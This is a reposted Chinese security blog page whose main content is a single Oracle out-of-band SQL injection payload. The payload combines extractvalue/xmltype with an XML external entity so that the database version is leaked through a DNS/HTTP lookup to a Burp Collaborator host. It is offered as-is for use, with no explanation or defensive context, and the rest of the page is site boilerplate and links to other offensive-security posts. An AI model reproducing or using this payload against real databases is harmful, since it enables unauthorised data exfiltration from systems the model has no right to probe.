通过Burp使用DNS协作器进行的带外SQL攻击

2022年12月25日01:03:19评论25 views字数 246阅读0分49秒阅读模式

Version Payload :

(select extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % vapot SYSTEM "'||(select version from v$instance)||'Burp/">%vapot;]>'),'/l') from dual)

原文始发于微信公众号（Khan安全攻防实验室）：通过Burp使用DNS协作器进行的带外SQL攻击

左青龙
微信扫一扫

右白虎
微信扫一扫

burp
payload
extractvalue
vapot
xmltype

本文由 admin 发表于 2022年12月25日01:03:19
转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出)：
通过Burp使用DNS协作器进行的带外SQL攻击https://cn-sec.com/archives/1478687.html

在线咨询

13688888888

8888 QQ在线咨询

微信
本页二维码

通过Burp使用DNS协作器进行的带外SQL攻击

【免杀】记一次lnk钓鱼小技巧

网络虚拟化技术：VXLAN，与VLAN有啥区别？

ARP:地址解析协议

[AI安全论文] (32)南洋理工大学刘杨教授——网络空间安全和AIGC整合之道学习笔记及强推（InForSec）

任意用户登录漏洞挖掘思路

AI安全白皮书 - 华为

人工智能硬件安全白皮书 - DUEROS百度安全

漏洞挖掘 | 某学工平台越权

PostExpKit - 20240423更新

yzmcms-pay_callback-rce漏洞复现

发表评论

在线咨询

微信